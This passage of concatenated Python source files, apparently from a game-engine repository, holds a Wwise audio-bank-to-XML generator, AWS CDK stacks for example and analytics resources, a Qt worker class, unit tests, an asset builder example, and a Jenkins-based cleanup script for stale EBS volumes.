Have a matching .bnk file next to it :param folder: Starting folder for the search :return: Yields a filepath that conforms with conditions 1 and 2 above """ for f in os.listdir(folder): filepath = os.path.join(folder, f) if os.path.isdir(filepath): for file in get_bnktxt_files(filepath): yield file elif os.path.isfile(filepath) and filepath.endswith('.txt'): bnk_file = filepath.replace('.txt', '.bnk') if os.path.exists(bnk_file): yield filepath def process_simple_types(file, func): line = file.readline().rstrip('\n') while line: columns = line.split('\t') assert len(columns) == 7, 'Column count should be 7 after tokenizing' func(columns[2], columns[5]) line = file.readline().rstrip('\n') def process_switches(file, group_type): global all_switches global all_states line = file.readline().rstrip('\n') while line: columns = line.split('\t') assert len(columns) == 7, 'Column count should be 7 after tokenizing' group = columns[2] path = columns[5] if group_type == SWITCH_TYPE: if group not in all_switches: all_switches[group] = ATLSwitch(group, path) elif group_type == STATE_TYPE: if group not in all_states: all_states[group] = ATLSwitch(group, path) line = file.readline().rstrip('\n') def process_switch_states(file, group_type): global all_switches global all_states line = file.readline().rstrip('\n') while line: columns = line.split('\t') assert len(columns) == 7, 'Column count should be 7 after tokenizing' group = columns[3] child = columns[2] if group_type == SWITCH_TYPE: if group in all_switches: if child not in all_switches[group].states: all_switches[group].states[child] = ATLSwitchState(child, group, group_type) elif group_type == STATE_TYPE: if group in all_states: if child not in all_states[group].states: all_states[group].states[child] = ATLSwitchState(child, group, group_type) line = file.readline().rstrip('\n') def parse_bnktxt_file(file): print('Processing {}'.format(file)) global all_auxbusses global all_events global all_parameters with open(file) as f: line = f.readline() # readline() returns empty string when reaching end of file, so strip the newline inside this while loop. 
while line: line = line.rstrip('\n') columns = line.split('\t') if columns[0] == 'Auxiliary Bus': process_simple_types(f, lambda name, path: all_auxbusses.add(ATLEnvironment(name, path))) elif columns[0] == 'Event': process_simple_types(f, lambda name, path: all_events.add(ATLTrigger(name, path))) elif columns[0] == 'Game Parameter': process_simple_types(f, lambda name, path: all_parameters.add(ATLRtpc(name, path))) elif columns[0] == 'State Group': process_switches(f, STATE_TYPE) elif columns[0] == 'Switch Group': process_switches(f, SWITCH_TYPE) elif columns[0] == 'State': process_switch_states(f, STATE_TYPE) elif columns[0] == 'Switch': process_switch_states(f, SWITCH_TYPE) line = f.readline() def write_xml_output(filepath): filename = os.path.basename(filepath) filename = os.path.splitext(filename)[0] root = ElementTree.Element('ATLConfig', atl_name=filename) sort_key = attrgetter('name', 'path') envs = ElementTree.SubElement(root, 'AudioEnvironments') for auxbus in sorted(all_auxbusses, key=sort_key): auxbus.attach_xml(envs) rtpcs = ElementTree.SubElement(root, 'AudioRTPCs') for rtpc in sorted(all_parameters, key=sort_key): rtpc.attach_xml(rtpcs) switches = ElementTree.SubElement(root, 'AudioSwitches') for state in sorted(all_states.values(), key=sort_key): state.attach_xml(switches) for switch in sorted(all_switches.values(), key=sort_key): switch.attach_xml(switches) trigs = ElementTree.SubElement(root, 'AudioTriggers') for trigger in sorted(all_events, key=sort_key): trigger.attach_xml(trigs) preloads = ElementTree.SubElement(root, 'AudioPreloads') for preload in sorted(all_preloads, key=sort_key): preload.attach_xml(preloads) # Prettify the XML document before writing # Unfortunately xml.etree does not contain easy pretty printing so transfer the doc to minidom. raw_string = ElementTree.tostring(root) xml_dom = minidom.parseString(raw_string) pretty_string = xml_dom.toprettyxml(indent=' ', encoding='utf-8').decode('UTF-8') try: with open(filepath, mode="w") as f: f.write(pretty_string) except OSError as e: sys.exit('Error: {}'.format(e.strerror)) def run_wwise_atl_gen_tool(): print('Wwise ATL Generator Tool v{}'.format(__version__)) print(__copyright__) print() options = get_options() output_file = os.path.join(options.atlPath, options.atlName) # Pre-parse the output file (if it exists) and split out the preloads into 'manual' and 'auto' load types... manual_preloads, auto_preloads = get_load_types_of_existing_preloads(output_file) localized_bank_paths = scan_for_localization_folders(options.bankPath) # Parse Wwise Bank TXT files for info... for f in get_bnktxt_files(options.bankPath): path, file = os.path.split(f) preload = os.path.splitext(file)[0].lower() is_localized = (path in localized_bank_paths) is_autoload = (preload in auto_preloads) or (options.autoLoad and preload not in manual_preloads) # Skip the ATL Preload for init.bnk, it's automatically loaded at runtime so it doesn't need to be written... if preload != 'init': all_preloads.add(ATLPreloadRequest(preload, 'SoundBanks', is_localized, is_autoload)) parse_bnktxt_file(f) # Debug printing... 
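    # The debug listing below prints each control as "<wwise path>/<name>"
    # (see ATLType.__str__), e.g. something like "Events/Music/Play_Music".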
if options.printDebug: sort_key = attrgetter('name', 'path') print('\nEvents:') for event in sorted(all_events, key=sort_key): print(event) print('\nParameters:') for parameter in sorted(all_parameters, key=sort_key): print(parameter) print('\nAuxBusses:') for auxbus in sorted(all_auxbusses, key=sort_key): print(auxbus) print('\nSwitches:') for switch in sorted(all_switches.values(), key=sort_key): for state in sorted(switch.states.values(), key=sort_key): print(state) print('\nStates:') for switch in sorted(all_states.values(), key=sort_key): for state in sorted(switch.states.values(), key=sort_key): print(state) print('\nSoundBanks:') for bank in sorted(all_preloads, key=sort_key): print(bank) # Output to XML... write_xml_output(output_file) print('Done!') if __name__ == '__main__': run_wwise_atl_gen_tool() ``` #### File: cdk/example/example_resources_stack.py ```python import os from aws_cdk import ( aws_lambda as lambda_, aws_s3 as s3, aws_s3_deployment as s3_deployment, aws_dynamodb as dynamo, core ) from core_stack_properties import CoreStackProperties from .auth import AuthPolicy class ExampleResources(core.Stack): """ Defines a set of resources to use with AWSCore's ScriptBehaviours and examples. The example resources are: * An S3 bucket with a text file * A python 'echo' lambda * A small dynamodb table with the a primary 'id': str key """ def __init__(self, scope: core.Construct, id_: str, project_name: str, feature_name: str, props_: CoreStackProperties, **kwargs) -> None: super().__init__(scope, id_, **kwargs, description=f'Contains resources for the AWSCore examples as part of the ' f'{project_name} project') self._project_name = project_name self._feature_name = feature_name self._policy = AuthPolicy(context=self).generate_admin_policy(stack=self) self._s3_bucket = self.__create_s3_bucket() self._lambda = self.__create_example_lambda() self._table = self.__create_dynamodb_table() self.__create_outputs() # Finally grant cross stack references self.__grant_access(props=props_) def __grant_access(self, props: CoreStackProperties): self._s3_bucket.grant_read(props.user_group) self._s3_bucket.grant_read(props.admin_group) self._lambda.grant_invoke(props.user_group) self._lambda.grant_invoke(props.admin_group) self._table.grant_read_data(props.user_group) self._table.grant_read_data(props.admin_group) def __create_s3_bucket(self) -> s3.Bucket: # Create a sample S3 bucket following S3 best practices # # See https://docs.aws.amazon.com/AmazonS3/latest/dev/security-best-practices.html # 1. Block all public access to the bucket # 2. Use SSE-S3 encryption. 
Explore encryption at rest options via # https://docs.aws.amazon.com/AmazonS3/latest/userguide/serv-side-encryption.html example_bucket = s3.Bucket( self, f'{self._project_name}-{self._feature_name}-Example-S3bucket', block_public_access=s3.BlockPublicAccess.BLOCK_ALL, encryption=s3.BucketEncryption.S3_MANAGED ) s3_deployment.BucketDeployment( self, f'{self._project_name}-{self._feature_name}-S3bucket-Deployment', destination_bucket=example_bucket, sources=[ s3_deployment.Source.asset('example/s3_content') ], retain_on_delete=False ) return example_bucket def __create_example_lambda(self) -> lambda_.Function: # create lambda function function = lambda_.Function( self, f'{self._project_name}-{self._feature_name}-Lambda-Function', runtime=lambda_.Runtime.PYTHON_3_8, handler="lambda-handler.main", code=lambda_.Code.asset(os.path.join(os.path.dirname(__file__), 'lambda')) ) return function def __create_dynamodb_table(self) -> dynamo.Table: # create dynamo table # NB: CDK does not support seeding data, see simple table_seeder.py demo_table = dynamo.Table( self, f'{self._project_name}-{self._feature_name}-Table', partition_key=dynamo.Attribute( name="id", type=dynamo.AttributeType.STRING ) ) return demo_table def __create_outputs(self) -> None: # Define exports # Export resource group self._s3_output = core.CfnOutput( self, id=f'ExampleBucketOutput', description='An example S3 bucket name to use with AWSCore ScriptBehaviors', export_name=f"{self.stack_name}:ExampleS3Bucket", value=self._s3_bucket.bucket_name) # Define exports # Export resource group self._lambda_output = core.CfnOutput( self, id=f'ExampleLambdaOutput', description='An example Lambda name to use with AWSCore ScriptBehaviors', export_name=f"{self.stack_name}::ExampleLambdaFunction", value=self._lambda.function_name) # Export DynamoDB Table self._table_output = core.CfnOutput( self, id=f'ExampleDynamoTableOutput', description='An example DynamoDB Table name to use with AWSCore ScriptBehaviors', export_name=f"{self.stack_name}:ExampleTable", value=self._table.table_name) # Export user policy self._user_policy = core.CfnOutput( self, id=f'ExampleUserPolicyOutput', description='A User policy to invoke example resources', export_name=f"{self.stack_name}:ExampleUserPolicy", value=self._policy.managed_policy_arn) ``` #### File: ResourceMappingTool/multithread/worker.py ```python import sys import traceback from PySide2.QtCore import (QObject, QRunnable, Signal, Slot) class WorkerSignals(QObject): """ Defines the signals available from a running worker thread """ finished: Signal = Signal() error: Signal = Signal(tuple) result: Signal = Signal(object) class FunctionWorker(QRunnable): """ Custom worker, which is inheriting from QRunnable to handle worker thread setup, signals and wrap-up. 
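    A minimal usage sketch (the callable, slot and thread-pool names below are
    illustrative, not part of this module):

        from PySide2.QtCore import QThreadPool

        worker = FunctionWorker(load_resources, region='us-west-2')
        worker.signals.result.connect(on_result)
        worker.signals.error.connect(on_error)
        QThreadPool.globalInstance().start(worker)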
""" def __init__(self, function: any, *args: str, **kwargs: int) -> None: super(FunctionWorker, self).__init__() self.function = function self.args = args self.kwargs = kwargs self.signals: WorkerSignals = WorkerSignals() @Slot() def run(self) -> None: try: result: object = self.function(*self.args, **self.kwargs) except: # catch all exceptions for this generic worker traceback.print_exc() exctype, value = sys.exc_info()[:2] self.signals.error.emit((exctype, value, traceback.format_exc())) else: self.signals.result.emit(result) finally: self.signals.finished.emit() ``` #### File: unit/manager/test_configuration_manager.py ```python from typing import List from unittest import TestCase from unittest.mock import (MagicMock, patch) from manager.configuration_manager import ConfigurationManager from model import constants class TestConfigurationManager(TestCase): """ ConfigurationManager unit test cases """ _expected_directory_path: str = "dummy/directory/" _expected_config_files: List[str] = ["dummy.json"] _expected_account_id: str = "1234567890" _expected_region: str = "aws-global" _expected_configuration_manager: ConfigurationManager = ConfigurationManager() def test_get_instance_return_same_instance(self) -> None: assert ConfigurationManager.get_instance() is TestConfigurationManager._expected_configuration_manager def test_get_instance_raise_exception(self) -> None: self.assertRaises(Exception, ConfigurationManager) @patch("utils.aws_utils.setup_default_session") @patch("utils.aws_utils.get_default_region", return_value=_expected_region) @patch("utils.aws_utils.get_default_account_id", return_value=_expected_account_id) @patch("utils.file_utils.find_files_with_suffix_under_directory", return_value=_expected_config_files) @patch("utils.file_utils.check_path_exists", return_value=True) @patch("utils.file_utils.get_current_directory_path", return_value=_expected_directory_path) def test_setup_get_configuration_setup_as_expected(self, mock_get_current_directory_path: MagicMock, mock_check_path_exists: MagicMock, mock_find_files_with_suffix_under_directory: MagicMock, mock_get_default_account_id: MagicMock, mock_get_default_region: MagicMock, mock_setup_default_session: MagicMock) -> None: TestConfigurationManager._expected_configuration_manager.setup("", "") mock_setup_default_session.assert_called_once() mock_get_current_directory_path.assert_called_once() mock_check_path_exists.assert_called_once_with(TestConfigurationManager._expected_directory_path) mock_find_files_with_suffix_under_directory.assert_called_once_with( TestConfigurationManager._expected_directory_path, constants.RESOURCE_MAPPING_CONFIG_FILE_NAME_SUFFIX) mock_get_default_account_id.assert_called_once() mock_get_default_region.assert_called_once() assert TestConfigurationManager._expected_configuration_manager.configuration.config_directory == \ TestConfigurationManager._expected_directory_path assert TestConfigurationManager._expected_configuration_manager.configuration.config_files == \ TestConfigurationManager._expected_config_files assert TestConfigurationManager._expected_configuration_manager.configuration.account_id == \ TestConfigurationManager._expected_account_id assert TestConfigurationManager._expected_configuration_manager.configuration.region == \ TestConfigurationManager._expected_region @patch("utils.aws_utils.setup_default_session") @patch("utils.aws_utils.get_default_region", return_value=_expected_region) @patch("utils.aws_utils.get_default_account_id", return_value=_expected_account_id) 
@patch("utils.file_utils.find_files_with_suffix_under_directory", return_value=_expected_config_files) @patch("utils.file_utils.check_path_exists", return_value=True) @patch("utils.file_utils.normalize_file_path", return_value=_expected_directory_path) def test_setup_get_configuration_setup_with_path_as_expected(self, mock_normalize_file_path: MagicMock, mock_check_path_exists: MagicMock, mock_find_files_with_suffix_under_directory: MagicMock, mock_get_default_account_id: MagicMock, mock_get_default_region: MagicMock, mock_setup_default_session: MagicMock) -> None: TestConfigurationManager._expected_configuration_manager.setup( "", TestConfigurationManager._expected_directory_path) mock_setup_default_session.assert_called_once() mock_normalize_file_path.assert_called_once() mock_check_path_exists.assert_called_once_with(TestConfigurationManager._expected_directory_path) mock_find_files_with_suffix_under_directory.assert_called_once_with( TestConfigurationManager._expected_directory_path, constants.RESOURCE_MAPPING_CONFIG_FILE_NAME_SUFFIX) mock_get_default_account_id.assert_called_once() mock_get_default_region.assert_called_once() assert TestConfigurationManager._expected_configuration_manager.configuration.config_directory == \ TestConfigurationManager._expected_directory_path assert TestConfigurationManager._expected_configuration_manager.configuration.config_files == \ TestConfigurationManager._expected_config_files assert TestConfigurationManager._expected_configuration_manager.configuration.account_id == \ TestConfigurationManager._expected_account_id assert TestConfigurationManager._expected_configuration_manager.configuration.region == \ TestConfigurationManager._expected_region ``` #### File: cdk/aws_metrics/aws_metrics_stack.py ```python from aws_cdk import ( core ) from .real_time_data_processing import RealTimeDataProcessing from .data_ingestion import DataIngestion from .batch_processing import BatchProcessing from .batch_analytics import BatchAnalytics from .data_lake_integration import DataLakeIntegration from .dashboard import Dashboard class AWSMetricsStack(core.Stack): """ Create the feature stack for the AWSMetrics Gem. Please reference the CloudFormation template provided by the Game Analytics Pipeline for the full production ready solution. This CDK application deploys a simplified version of this pipeline as an example. 
https://docs.aws.amazon.com/solutions/latest/game-analytics-pipeline/template.html """ def __init__(self, scope: core.Construct, id_: str, application_name: str, optional_features: dict, **kwargs) -> None: super().__init__(scope, id_, **kwargs) self._data_ingestion = DataIngestion(self, application_name) self._real_time_data_processing = RealTimeDataProcessing( self, input_stream_arn=self._data_ingestion.input_stream_arn, application_name=application_name ) batch_processing_enabled = optional_features.get('batch_processing', False) self._data_lake_integration = DataLakeIntegration( self, application_name=application_name ) if batch_processing_enabled else None self._batch_processing = BatchProcessing( self, input_stream_arn=self._data_ingestion.input_stream_arn, analytics_bucket_arn=self._data_lake_integration.analytics_bucket_arn, events_database_name=self._data_lake_integration.events_database_name, events_table_name=self._data_lake_integration.events_table_name ) if batch_processing_enabled else None self._batch_analytics = BatchAnalytics( self, analytics_bucket_name=self._data_lake_integration.analytics_bucket_name, events_database_name=self._data_lake_integration.events_database_name, events_table_name=self._data_lake_integration.events_table_name ) if batch_processing_enabled else None self._dashboard = Dashboard( self, input_stream_name=self._data_ingestion.input_stream_name, application_name=application_name, analytics_processing_lambda_name=self._real_time_data_processing.analytics_processing_lambda_name, delivery_stream_name=self._batch_processing.delivery_stream_name if batch_processing_enabled else '', events_processing_lambda_name=self._batch_processing.events_processing_lambda_name if batch_processing_enabled else '' ) @property def data_ingestion_component(self): return self._data_ingestion @property def real_time_data_processing_component(self): return self._real_time_data_processing @property def dashboard_component(self): return self._dashboard @property def data_lake_integration_component(self): return self._data_lake_integration @property def batch_processing_component(self): return self._batch_processing @property def batch_analytics_component(self): return self._batch_analytics ``` #### File: cdk/aws_metrics/data_lake_integration.py ```python from aws_cdk import ( core, aws_iam as iam, aws_s3 as s3, aws_glue as glue ) from . import aws_metrics_constants class DataLakeIntegration: """ Create the AWS resources including the S3 bucket, Glue database, table and crawler for data lake integration """ def __init__(self, stack: core.Construct, application_name: str) -> None: self._stack = stack self._application_name = application_name self._create_analytics_bucket() self._create_events_database() self._create_events_table() self._create_events_crawler() def _create_analytics_bucket(self) -> None: """ Create a a private bucket that should only be accessed by the resources defined in the CDK application. The bucket uses server-side encryption with a CMK managed by S3: https://docs.aws.amazon.com/AmazonS3/latest/userguide/UsingKMSEncryption.html """ # Bucket name cannot contain uppercase characters # Do not specify the bucket name here since bucket name is required to be unique globally. If we set # a specific name here, only one customer can deploy the bucket successfully. 
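        # (When bucket_name is omitted like this, CloudFormation derives a
        # globally unique physical name from the stack name, the construct id
        # below and a random suffix.)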
self._analytics_bucket = s3.Bucket( self._stack, id=f'{self._stack.stack_name}-AnalyticsBucket'.lower(), encryption=s3.BucketEncryption.S3_MANAGED, block_public_access=s3.BlockPublicAccess( block_public_acls=True, block_public_policy=True, ignore_public_acls=True, restrict_public_buckets=True ) ) # For Amazon S3 buckets, you must delete all objects in the bucket for deletion to succeed. cfn_bucket = self._analytics_bucket.node.find_child('Resource') cfn_bucket.apply_removal_policy(core.RemovalPolicy.DESTROY) def _create_events_database(self) -> None: """ Create the Glue database for metrics events. """ # Database name cannot contain uppercase characters self._events_database = glue.CfnDatabase( self._stack, id='EventsDatabase', catalog_id=self._stack.account, database_input=glue.CfnDatabase.DatabaseInputProperty( description=f'Metrics events database for stack {self._stack.stack_name}', location_uri=f's3://{self._analytics_bucket.bucket_name}', name=f'{self._stack.stack_name}-EventsDatabase'.lower() ) ) def _create_events_table(self) -> None: """ Create the Glue table for metrics events. This table is used by the Kinesis Data Firehose to convert data from the JSON format to the Parquet format before writing it to Amazon S3. """ self._events_table = glue.CfnTable( self._stack, id=f'EventsTable', catalog_id=self._stack.account, database_name=self._events_database.ref, table_input=glue.CfnTable.TableInputProperty( description=f'Stores metrics event data from the analytics pipeline for stack {self._stack.stack_name}', name=aws_metrics_constants.GLUE_TABLE_NAME, table_type='EXTERNAL_TABLE', partition_keys=[ glue.CfnTable.ColumnProperty( name='year', type='string' ), glue.CfnTable.ColumnProperty( name='month', type='string' ), glue.CfnTable.ColumnProperty( name='day', type='string' ), ], parameters={ 'classification': 'parquet', 'compressionType': 'none', 'typeOfData': 'file' }, storage_descriptor=glue.CfnTable.StorageDescriptorProperty( input_format=aws_metrics_constants.GLUE_TABLE_INPUT_FORMAT, output_format=aws_metrics_constants.GLUE_TABLE_OUTPUT_FORMAT, serde_info=glue.CfnTable.SerdeInfoProperty( serialization_library=aws_metrics_constants.GLUE_TABLE_SERIALIZATION_LIBRARY, parameters={ 'serialization.format': aws_metrics_constants.GLUE_TABLE_SERIALIZATION_LIBRARY_SERIALIZATION_FORMAT } ), stored_as_sub_directories=False, location=f's3://{self._analytics_bucket.bucket_name}/{aws_metrics_constants.GLUE_TABLE_NAME}/', columns=[ glue.CfnTable.ColumnProperty( name='event_id', type='string' ), glue.CfnTable.ColumnProperty( name='event_type', type='string' ), glue.CfnTable.ColumnProperty( name='event_name', type='string' ), glue.CfnTable.ColumnProperty( name='event_timestamp', type='string' ), glue.CfnTable.ColumnProperty( name='event_version', type='string' ), glue.CfnTable.ColumnProperty( name='event_source', type='string' ), glue.CfnTable.ColumnProperty( name='application_id', type='string' ), glue.CfnTable.ColumnProperty( name='event_data', type='string' ) ] ) ) ) def _create_events_crawler(self) -> None: """ Create the Glue crawler to populate the AWS Glue Data Catalog with tables. 
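        No schedule is attached here, so the crawler is expected to be started
        on demand; for example (illustrative; assumes boto3 is available and
        credentials are configured):

            boto3.client('glue').start_crawler(Name=events_crawler_name)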
""" self._create_events_crawler_role() self._events_crawler = glue.CfnCrawler( self._stack, id='EventsCrawler', name=f'{self._stack.stack_name}-EventsCrawler', role=self._events_crawler_role.role_arn, database_name=self._events_database.ref, targets=glue.CfnCrawler.TargetsProperty( s3_targets=[ glue.CfnCrawler.S3TargetProperty( path=f's3://{self._analytics_bucket.bucket_name}/{aws_metrics_constants.GLUE_TABLE_NAME}/' ) ] ), schema_change_policy=glue.CfnCrawler.SchemaChangePolicyProperty( update_behavior='UPDATE_IN_DATABASE', delete_behavior='LOG', ), configuration=aws_metrics_constants.CRAWLER_CONFIGURATION ) events_crawler_output = core.CfnOutput( self._stack, id='EventsCrawlerName', description='Glue Crawler to populate the AWS Glue Data Catalog with metrics events tables', export_name=f"{self._application_name}:EventsCrawler", value=self._events_crawler.name) def _create_events_crawler_role(self) -> None: """ Create the IAM role for the Glue crawler. """ policy_statements = list() s3_policy_statement = iam.PolicyStatement( actions=[ 's3:ListBucket', 's3:GetObject', 's3:PutObject', 's3:DeleteObject' ], effect=iam.Effect.ALLOW, resources=[ self._analytics_bucket.bucket_arn, f'{self._analytics_bucket.bucket_arn}/*' ] ) policy_statements.append(s3_policy_statement) glue_table_policy_statement = iam.PolicyStatement( actions=[ 'glue:BatchGetPartition', 'glue:GetPartition', 'glue:GetPartitions', 'glue:BatchCreatePartition', 'glue:CreatePartition', 'glue:CreateTable', 'glue:GetTable', 'glue:GetTables', 'glue:GetTableVersion', 'glue:GetTableVersions', 'glue:UpdatePartition', 'glue:UpdateTable' ], effect=iam.Effect.ALLOW, resources=[ core.Fn.sub( 'arn:${AWS::Partition}:glue:${AWS::Region}:${AWS::AccountId}:catalog' ), core.Fn.sub( body='arn:${AWS::Partition}:glue:${AWS::Region}:${AWS::AccountId}:table/${EventsDatabase}/*', variables={ 'EventsDatabase': self._events_database.ref } ), core.Fn.sub( body='arn:${AWS::Partition}:glue:${AWS::Region}:${AWS::AccountId}:database/${EventsDatabase}', variables={ 'EventsDatabase': self._events_database.ref } ) ] ) policy_statements.append(glue_table_policy_statement) glue_database_policy_statement = iam.PolicyStatement( actions=[ 'glue:GetDatabase', 'glue:GetDatabases', 'glue:UpdateDatabase' ], effect=iam.Effect.ALLOW, resources=[ core.Fn.sub( 'arn:${AWS::Partition}:glue:${AWS::Region}:${AWS::AccountId}:catalog' ), core.Fn.sub( body='arn:${AWS::Partition}:glue:${AWS::Region}:${AWS::AccountId}:database/${EventsDatabase}', variables={ 'EventsDatabase': self._events_database.ref } ) ] ) policy_statements.append(glue_database_policy_statement) log_policy_statement = iam.PolicyStatement( actions=[ 'logs:CreateLogGroup', 'logs:CreateLogStream', 'logs:PutLogEvents' ], effect=iam.Effect.ALLOW, resources=[ core.Fn.sub( 'arn:${AWS::Partition}:logs:${AWS::Region}:${AWS::AccountId}:log-group:/aws-glue/crawlers:*' ) ] ) policy_statements.append(log_policy_statement) events_crawler_policy_document = iam.PolicyDocument( statements=policy_statements ) self._events_crawler_role = iam.Role( self._stack, id='EventsCrawlerRole', role_name=f'{self._stack.stack_name}-EventsCrawlerRole', assumed_by=iam.ServicePrincipal( service='glue.amazonaws.com' ), inline_policies={ 'GameAnalyticsPipelineGlueCrawlerPolicy': events_crawler_policy_document } ) @property def analytics_bucket_arn(self) -> s3.Bucket.bucket_arn: return self._analytics_bucket.bucket_arn @property def analytics_bucket_name(self) -> s3.Bucket.bucket_name: return self._analytics_bucket.bucket_name @property def 
events_database_name(self) -> str: return self._events_database.ref @property def events_table_name(self) -> str: return self._events_table.ref @property def events_crawler_name(self) -> str: return self._events_crawler.name @property def events_crawler_role_arn(self) -> iam.Role.role_arn: return self._events_crawler_role.role_arn ``` #### File: Code/Tests/asset_builder_example.py ```python import azlmbr.math import azlmbr.asset.builder import os, shutil # the UUID must be unique amongst all the asset builders in Python or otherwise busIdString = '{E4DB381B-61A0-4729-ACD9-4C8BDD2D2282}' busId = azlmbr.math.Uuid_CreateString(busIdString, 0) assetTypeScript = azlmbr.math.Uuid_CreateString('{82557326-4AE3-416C-95D6-C70635AB7588}', 0) handler = None jobKeyPrefix = 'Foo Job Key' targetAssetFolder = 'foo_scripts' # creates a single job to compile for a 'pc' platform def on_create_jobs(args): request = args[0] # azlmbr.asset.builder.CreateJobsRequest response = azlmbr.asset.builder.CreateJobsResponse() # note: if the asset builder is going to handle more than one file pattern it might need to check out # the request.sourceFile to figure out what jobs need to be created jobDescriptorList = [] for platformInfo in request.enabledPlatforms: # for each enabled platform like 'pc' or 'ios' platformId = platformInfo.identifier # set up unique job key jobKey = '{} {}'.format(jobKeyPrefix, platformId) # create job descriptor jobDesc = azlmbr.asset.builder.JobDescriptor() jobDesc.jobKey = jobKey jobDesc.set_platform_identifier(platformId) jobDescriptorList.append(jobDesc) print ('created a job for {} with key {}'.format(platformId, jobKey)) response.createJobOutputs = jobDescriptorList response.result = azlmbr.asset.builder.CreateJobsResponse_ResultSuccess return response def get_target_name(sourceFullpath): lua_file = os.path.basename(sourceFullpath) lua_file = os.path.splitext(lua_file)[0] lua_file = lua_file + '.lua' return lua_file def copy_foo_file(srcFile, dstFile): try: dir_name = os.path.dirname(dstFile) if (os.path.exists(dir_name) is False): os.makedirs(dir_name) shutil.copyfile(srcFile, dstFile) return True except: return False # using the incoming 'request' find the type of job via 'jobKey' to determine what to do def on_process_job(args): request = args[0] # azlmbr.asset.builder.ProcessJobRequest response = azlmbr.asset.builder.ProcessJobResponse() # note: if possible to loop through incoming data a 'yeild' can be used to cooperatively # thread the processing of the assets so that shutdown and cancel can be handled if (request.jobDescription.jobKey.startswith(jobKeyPrefix)): targetFile = os.path.join(targetAssetFolder, get_target_name(request.fullPath)) dstFile = os.path.join(request.tempDirPath, targetFile) if (copy_foo_file(request.fullPath, dstFile)): response.outputProducts = [azlmbr.asset.builder.JobProduct(dstFile, assetTypeScript, 0)] response.resultCode = azlmbr.asset.builder.ProcessJobResponse_Success response.dependenciesHandled = True return response def on_shutdown(args): # note: user should attempt to close down any processing job if any running global handler if (handler is not None): handler.disconnect() handler = None def on_cancel_job(args): # note: user should attempt to close down any processing job if any running print('>>> FOO asset builder - on_cancel_job <<<') # register asset builder for source assets def register_asset_builder(): assetPattern = azlmbr.asset.builder.AssetBuilderPattern() assetPattern.pattern = '*.foo' assetPattern.type = 
azlmbr.asset.builder.AssetBuilderPattern_Wildcard builderDescriptor = azlmbr.asset.builder.AssetBuilderDesc() builderDescriptor.name = "Foo Asset Builder" builderDescriptor.patterns = [assetPattern] builderDescriptor.busId = busId builderDescriptor.version = 0 outcome = azlmbr.asset.builder.PythonAssetBuilderRequestBus(azlmbr.bus.Broadcast, 'RegisterAssetBuilder', builderDescriptor) if outcome.IsSuccess(): # created the asset builder handler to hook into the notification bus jobHandler = azlmbr.asset.builder.PythonBuilderNotificationBusHandler() jobHandler.connect(busId) jobHandler.add_callback('OnCreateJobsRequest', on_create_jobs) jobHandler.add_callback('OnProcessJobRequest', on_process_job) jobHandler.add_callback('OnShutdown', on_shutdown) jobHandler.add_callback('OnCancel', on_cancel_job) return jobHandler # note: the handler has to be retained since Python retains the object ref count # on_shutdown will clear the 'handler' to disconnect from the notification bus handler = register_asset_builder() ``` #### File: build/tools/delete_stale_ebs.py ```python import os import requests import traceback import boto3 import json from datetime import datetime from requests.auth import HTTPBasicAuth from urllib.parse import unquote class JenkinsAPIClient: def __init__(self, jenkins_base_url, jenkins_username, jenkins_api_token): self.jenkins_base_url = jenkins_base_url.rstrip('/') self.jenkins_username = jenkins_username self.jenkins_api_token = jenkins_api_token def get(self, url, retry=1): for i in range(retry): try: response = requests.get(url, auth=HTTPBasicAuth(self.jenkins_username, self.jenkins_api_token)) if response.ok: return response.json() except Exception: traceback.print_exc() print(f'WARN: Get request {url} failed, retying....') print(f'WARN: Get request {url} failed, see exception for more details.') def get_pipeline(self, pipeline_name): url = f'{self.jenkins_base_url}/job/{pipeline_name}/api/json' # Use retry because Jenkins API call sometimes may fail when Jenkins server is on high load return self.get(url, retry=3) def get_branch_job(self, pipeline_name, branch_name): url = f'{self.jenkins_base_url}/blue/rest/organizations/jenkins/pipelines/{pipeline_name}/branches/{branch_name}' # Use retry because Jenkins API call sometimes may fail when Jenkins server is on high load return self.get(url, retry=3) def delete_branch_ebs_volumes(branch_name): """ Make a fake branch deleted event and invoke the lambda function that we use to delete branch EBS volumes after a branch is deleted. """ # Unescape branch name as it's URL encoded branch_name = unquote(branch_name) input = { "detail": { "event": "referenceDeleted", "repositoryName": "Lumberyard", "referenceName": branch_name } } client = boto3.client('lambda') # Invoke lambda function "AutoDeleteEBS-Lambda" asynchronously. # This lambda function can have 1000 concurrent runs. # we will setup a SQS/SNS queue to process the events if the event number exceeds the function capacity. client.invoke( FunctionName='AutoDeleteEBS-Lambda', InvocationType='Event', Payload=json.dumps(input), ) def delete_old_branch_ebs_volumes(env): """ Check last run time of each branch build, if it exceeds the retention days, delete the EBS volumes that are tied to the branch. 
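    Relies on the JENKINS_URL / JENKINS_USERNAME / JENKINS_API_TOKEN /
    PIPELINE_NAME / RETENTION_DAYS environment variables collected in main();
    for example, RETENTION_DAYS=30 means a branch whose latest run started
    more than 30 days ago gets its EBS volumes deleted.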
""" branch_volumes_deleted = [] jenkins_client = JenkinsAPIClient(env['JENKINS_URL'], env['JENKINS_USERNAME'], env['JENKINS_API_TOKEN']) today_date = datetime.today().date() pipeline_name = env['PIPELINE_NAME'] pipeline_job = jenkins_client.get_pipeline(pipeline_name) if not pipeline_job: print(f'ERROR: Cannot get data of pipeline job {pipeline_name}.') exit(1) branch_jobs = pipeline_job.get('jobs', []) retention_days = int(env['RETENTION_DAYS']) for branch_job in branch_jobs: branch_name = branch_job['name'] branch_job = jenkins_client.get_branch_job(pipeline_name, branch_name) if not branch_job: print(f'WARN: Cannot get data of {branch_name} job , skipping branch {pipeline_name}.') continue latest_run = branch_job.get('latestRun') # If the job hasn't run, then there is no EBS volumes tied to that job if latest_run: latest_run_start_time = latest_run.get('startTime') latest_run_datetime = datetime.strptime(latest_run_start_time, '%Y-%m-%dT%H:%M:%S.%f%z') # Convert startTime to local timezone to compare, because Jenkins server may use a different timezone. latest_run_date = latest_run_datetime.astimezone().date() date_diff = today_date - latest_run_date if date_diff.days > retention_days: print(f'Branch {branch_name} job hasn\'t run for over {retention_days} days, deleting the EBS volumes of this branch...') delete_branch_ebs_volumes(branch_name) branch_volumes_deleted.append(branch_name) print('Deleted EBS volumes for branches:') print('\n'.join(branch_volumes_deleted)) def get_required_env(env, keys): success = True for key in keys: try: env[key] = os.environ[key].strip() except KeyError: print(f'ERROR: {key} is not set in environment variable') success = False return success def main(): env = {} required_env_list = [ 'JENKINS_URL', 'JENKINS_USERNAME', 'JENKINS_API_TOKEN', 'PIPELINE_NAME', 'RETENTION_DAYS' ] if not 